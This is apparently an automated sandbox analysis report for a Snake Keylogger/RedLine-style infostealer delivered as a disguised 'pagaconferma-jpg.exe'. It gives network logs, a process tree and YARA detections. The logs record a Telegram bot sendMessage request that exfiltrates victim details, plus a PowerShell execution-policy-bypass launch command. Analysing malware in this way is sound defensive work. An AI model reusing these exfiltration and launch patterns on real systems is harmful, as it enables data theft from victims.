                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 4
                                                                                                                                                                                  Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QYHeU%2F3R0zgHfs0vo0IGlWFFoDzfLV3D6sLW8gTl6jA8qAKLESouLcLydnU8USkHeDC4sPgVu476bo9aRrEoaDVXX0pBRtrNDqTJmUzRasSDknYVfd5qN0oho5pWnjvx2XIqB2H6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8d7b62424c1419e7-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=94392&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=40480&cwnd=248&unsent_bytes=0&cid=6cbc7f5cb2b794da&ts=253&x=0"
                                                                                                                                                                                  2024-10-24 16:36:06 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
                                                                                                                                                                                  Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
                                                                                                                                                                                  2024-10-24 16:36:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  5192.168.11.2049800104.21.67.1524438376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-24 16:36:06 UTC63OUTGET /xml/154.16.192.225 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  2024-10-24 16:36:06 UTC899INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:06 GMT
                                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: max-age=86400
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 4
                                                                                                                                                                                  Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=crtuIFd%2Fr8KLAJ%2F%2FZwKkrAp%2Fn6r1889H1O5ysW9DDuWlHVUVXq6qJL727KRdulkIQH%2BJeGUfS9h90EKShl%2FOOUHTK7k0fktdV9a%2B6nHzePBxGO6Sv3O2CN61%2FNRLX6YDhpufENMl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8d7b62472ae80f85-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=94956&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=40253&cwnd=252&unsent_bytes=0&cid=15488c6db32d2e15&ts=259&x=0"
                                                                                                                                                                                  2024-10-24 16:36:06 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
                                                                                                                                                                                  Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
                                                                                                                                                                                  2024-10-24 16:36:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  6192.168.11.2049802104.21.67.1524438376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-24 16:36:07 UTC87OUTGET /xml/154.16.192.225 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-10-24 16:36:07 UTC899INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:07 GMT
                                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: max-age=86400
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 5
                                                                                                                                                                                  Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x9vMp6W0JoFETxx2hNgqEbOttSP5i%2F3D2lw2BI%2B0bQ2fF6eqYaBHxLaCNR4i3%2BvpsxCgn7%2BFYq1XLY7CfMkNI4ca%2BajLcgbtNjNc2oEavNNkEqSTLTP%2BlG%2BpUHRrERSrRSs2x3%2Fr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8d7b624bff0c236a-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=94970&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=40311&cwnd=241&unsent_bytes=0&cid=444c2cc55971f663&ts=253&x=0"
                                                                                                                                                                                  2024-10-24 16:36:07 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
                                                                                                                                                                                  Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
                                                                                                                                                                                  2024-10-24 16:36:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  7192.168.11.2049804104.21.67.1524438376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-24 16:36:08 UTC87OUTGET /xml/154.16.192.225 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-10-24 16:36:08 UTC895INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:08 GMT
                                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: max-age=86400
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 6
                                                                                                                                                                                  Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRTGe6GMFixk1fdAUUFLi%2FFcBT5f9B3qtrptUxo9S%2F%2FuemCqlYn2RCr2o2ndnLqFu7LPZTm8%2FZq7MQgNhog8wC4fTVKVCbboIbTfT9QHGoeBfC7Ze5fBLuKNsiJLNP%2FWjNU%2BQ9os"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8d7b6250db784349-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=94877&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=40450&cwnd=248&unsent_bytes=0&cid=ff20f6c1afdfe3a8&ts=278&x=0"
                                                                                                                                                                                  2024-10-24 16:36:08 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
                                                                                                                                                                                  Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
                                                                                                                                                                                  2024-10-24 16:36:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  8192.168.11.2049806104.21.67.1524438376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-24 16:36:09 UTC87OUTGET /xml/154.16.192.225 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-10-24 16:36:09 UTC897INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:09 GMT
                                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: max-age=86400
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 7
                                                                                                                                                                                  Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j1VR%2B2Xtx3RxPkIQOvF2RL1ulmXP%2B5upf5FG%2BC%2FLU%2BjDgfx826t35tiUy3F3lxEMDIGgIi3lbA2OJKj3zgZWOWpcpr%2B1AmhF2D7sMo3BFqhjsv6JxFK%2BxwMDA4y2UtmWupH1xlIj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8d7b6255ef2b41fb-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=94322&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=40483&cwnd=252&unsent_bytes=0&cid=1f49cc279d62c290&ts=250&x=0"
                                                                                                                                                                                  2024-10-24 16:36:09 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
                                                                                                                                                                                  Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
                                                                                                                                                                                  2024-10-24 16:36:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  9192.168.11.2049807149.154.167.2204438376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-10-24 16:36:09 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2024/10/2024%20/%2020:04:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-10-24 16:36:10 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:10 GMT
                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                  2024-10-24 16:36:10 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                                  Statistics

                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:12:35:54
                                                                                                                                                                                  Start date:24/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1
                                                                                                                                                                                  Imagebase:0xf90000
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                  Start time:12:35:54
                                                                                                                                                                                  Start date:24/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff7d9000000
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:12:35:54
                                                                                                                                                                                  Start date:24/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
                                                                                                                                                                                  Imagebase:0xb80000
                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                  Start time:12:35:58
                                                                                                                                                                                  Start date:24/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\drivers\udfs.sys
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:344'064 bytes
                                                                                                                                                                                  MD5 hash:26D2727935221EFB0063B43A74B375BE
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                  Start time:12:35:58
                                                                                                                                                                                  Start date:24/10/2024
                                                                                                                                                                                  Path:\Device\CdRom0\9236-pagaconferma-jpg.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"D:\9236-pagaconferma-jpg.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1'155'263 bytes
                                                                                                                                                                                  MD5 hash:1AEFAA71B8996D22CAD66A84A7F279A0
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.31560050751.0000000003570000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                  Start time:12:35:59
                                                                                                                                                                                  Start date:24/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"D:\9236-pagaconferma-jpg.exe"
                                                                                                                                                                                  Imagebase:0xba0000
                                                                                                                                                                                  File size:47'016 bytes
                                                                                                                                                                                  MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.33967794321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.33970405843.000000000580D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
